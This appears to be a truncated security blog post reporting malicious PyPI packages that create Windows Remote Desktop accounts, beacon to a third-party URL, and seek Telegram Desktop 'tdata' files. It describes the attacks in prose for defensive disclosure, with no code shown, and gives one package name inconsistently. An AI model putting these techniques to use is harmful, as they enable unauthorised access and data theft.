This week, Sonatype discovered several malicious PyPI packages that set up new remote desktop user accounts on your Windows computer or steal encrypted Telegram data files from your Telegram Desktop client.
These packages were discovered by Sonatype’s automated malware detection system, offered as part of the Nexus platform products, including Nexus Firewall. Upon further investigation, we deemed these packages malicious and reported them to PyPI.
The main packages of interest are:
- bottle-requests-complex
- php-requests-complex
- tkinter-message-box
Create Remote Desktop Access Accounts in Windows
The two packages ‘flask-requests-complex’ and ‘php-requests-complex’ contain no description but are certainly named after the popular ‘requests’ module.
Both of these packages contain code that adds a new user account created by the attacker to the “Remote Desktop Users” group on Windows, allowing attackers to access the RDP system at will.
Additionally, the packages have been seen making a simple HTTP request to a third-party URL to likely inform the threat actor that the attack was successful.
Steals Telegram cache and settings files ‘tdata’
The ‘tkinter-message-box’ package is yet another example of a malicious package named after ‘tkinter’, Python’s standard interface for a GUI toolbox, which has no valid description:
But ‘tkinter-message-box’ does not contain any UI related code or a message box utility. Instead, it attempts to locate where your Telegram Desktop client stores its “tdata” files:
‘tdata’ files are supposed to be encrypted files generated by Telegram Desktop client to store settings and cache. Although cache files are unlikely to contain entire chat histories, they may contain JPG images, videos, and other media exchanged through the Telegram app that may remain on the device temporarily.
All of these packages were posted by the same “ternary ternary” PyPI account that has posted seven packages in total so far, almost all of which look suspicious.
Some packages, such as ‘bs4tools (Read more…)
